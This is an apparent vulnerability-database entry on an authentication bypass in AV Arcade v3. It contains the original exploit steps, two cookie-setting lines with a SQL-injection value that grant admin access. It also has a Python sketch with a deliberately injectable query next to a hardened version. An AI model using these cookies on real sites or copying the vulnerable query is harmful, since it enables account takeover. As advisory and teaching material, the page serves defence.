Vendor: AV Arcade
By: saudi0hacker
CVSS: 7.5 (HIGH)
Type: Auth Bypass / Cookie
CWE: 287
Product Name: AV Arcade
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: av_arcade_v3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

AV Arcade v3 Auth Bypass / Cookie

An attacker can bypass authentication by setting two cookies: ava_username set to 'admin', and ava_code set to "c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;".

Mitigation:

Validate authentication credentials on the server, and never accept client-supplied cookie values as proof of authentication.
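
The mitigation above as an added sketch; it is not AV Arcade's code and not part of the advisory. It assumes (the page does not show the source) that the ava_code cookie is concatenated into a SQL string, modelled here in Python with sqlite3; the schema, function names and the "session" cookie name are hypothetical.

```python
import hashlib, hmac, secrets, sqlite3

# Cookie values exactly as published in the advisory on this page.
ADVISORY_COOKIES = {"ava_username": "admin",
                    "ava_code": "c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"}

def kdf(password, salt):
    """Salted, slow password hash used by the hardened login path."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, 100_000)

def make_db():
    """In-memory stand-in for the user store; schema and data are constructed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY,"
               " pw_md5 TEXT, salt BLOB, pw_kdf BLOB)")
    db.execute("CREATE TABLE sessions (token TEXT PRIMARY KEY, username TEXT)")
    pw, salt = b"constructed-admin-password", secrets.token_bytes(16)
    db.execute("INSERT INTO users VALUES ('admin', ?, ?, ?)",
               (hashlib.md5(pw).hexdigest(), salt, kdf(pw, salt)))
    return db

def cookie_auth_vulnerable(db, cookies):
    """Assumed flaw: cookie values are pasted into the SQL text, so a quote
    inside ava_code ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND pw_md5 = '%s'"
           % (cookies.get("ava_username", ""), cookies.get("ava_code", "")))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login(db, username, password):
    """Hardened: bound parameters, constant-time compare, random session token."""
    row = db.execute("SELECT salt, pw_kdf FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None or not hmac.compare_digest(row[1], kdf(password.encode(), row[0])):
        return None
    token = secrets.token_urlsafe(32)
    db.execute("INSERT INTO sessions VALUES (?, ?)", (token, username))
    return token

def cookie_auth_hardened(db, cookies):
    """Hardened: the cookie holds only an opaque token, looked up as bound data;
    no username or password hash from the client is ever trusted."""
    row = db.execute("SELECT username FROM sessions WHERE token = ?",
                     (cookies.get("session", ""),)).fetchone()
    return row[0] if row else None
```

In the hardened path the advisory's cookie values are only ever compared as data, and a session exists only after login() has verified a password server-side.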
Source

Exploit-DB raw data:

:----------------------------------------------------------------------------:
: # Software      : AV Arcade v3   [PHP]                                     :
: # Site          : www.avscripts.net                                        :
: # Date          : 28/07/2010                                               :
: # Author        : saudi0hacker                                             :
: # Type          : Auth Bypass / Cookie                                     :
: # Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:

[1] Go to the URL:
    http://www.xxxxx.net/index.php?task=login

[2] Apply these cookies:

    Javascript:document.cookie = "ava_username=admin;"
    Javascript:document.cookie = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"

[3] Go to the main page:

[4] Enjoy